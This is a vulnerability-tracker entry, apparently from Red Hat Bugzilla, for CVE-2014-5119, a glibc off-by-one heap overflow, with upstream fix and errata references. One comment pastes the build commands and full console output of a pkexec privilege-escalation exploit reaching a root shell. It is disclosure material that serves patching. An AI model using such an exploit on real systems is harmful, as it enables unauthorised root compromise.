Hide Forgot
Tavis Ormandy reported an off-by-one error leading to a heap-based buffer overflow flaw in glibc's __gconv_translit_find() function. This could be triggered by setting the CHARSET environment variable to a malicious value. This could possibly lead to code execution as root if a set user ID (setuid) root application used this environment variable without sanitizing its value. References: http://www.openwall.com/lists/oss-security/2014/07/14/1 http://www.openwall.com/lists/oss-security/2014/07/14/2
MITRE assigned CVE-2014-5119 to this issue: http://seclists.org/oss-sec/2014/q3/358 Upstream bug: https://sourceware.org/bugzilla/show_bug.cgi?id=17187
*** Bug 1129743 has been marked as a duplicate of this bug. ***
Further information from Tavis Ormandy: https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html
Created attachment 930687 [details] CVE-2014-5119 exploit for Fedora 20 32-bit It's been a few months without progress, here's an exploit. $ make clean rm -f pkexploit pty *.o a.out *.so [taviso@localhost glibc]$ make cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pkexploit.c -o pkexploit cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pty.c -o pty cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c -o exploit.o exploit.c cc exploit.o -fPIC -shared -o exploit.so Execute pkexploit to attempt exploitation. [taviso@localhost glibc]$ ./pkexploit [*] --------------------------------------------------- [*] CVE-2014-5119 glibc __gconv_translit_find() exploit [*] ------------------------ taviso & scarybeasts ----- [*] Attempting to invoke pseudo-pty helper (this will take a few seconds)... [*] Read 7295 bytes of output from pseudo-pty helper, parsing... [*] pseudo-pty helper succeeded [*] attempting to parse libc fatal error message... [*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658 [*] attempting to parse the libc maps dump... [*] found libc.so mapped @0x40215000 [*] expecting libc.so bss to begin at 0x406c7000 [*] successfully located first morecore chunk w/tag @0x407d6000 [*] allocating space for argument structure... [*] creating command string... [*] creating a tls_dtor_list node... [*] open_translit() symbol will be at 0x40238320 [*] offsetof(struct known_trans, fname) => 32 [*] appending `./exploit.so` to list node [*] building parameter list... [*] anticipating tls_dtor_list to be at 0x406c82d4 [*] execvpe(pkexec...)... Error accessing /: File name too long uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 sh-4.2# exit exit
Statement: (none)
Reference: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html https://code.google.com/p/google-security-research/issues/detail?id=96
Upstream commit: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8 It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time.
IssueDescription: An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html
This issue has been addressed in following products: Red Hat Enterprise Linux 5.6 Long Life Red Hat Enterprise Linux 5.9 EUS - Server Only Red Hat Enterprise Linux 6.2 AUS Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html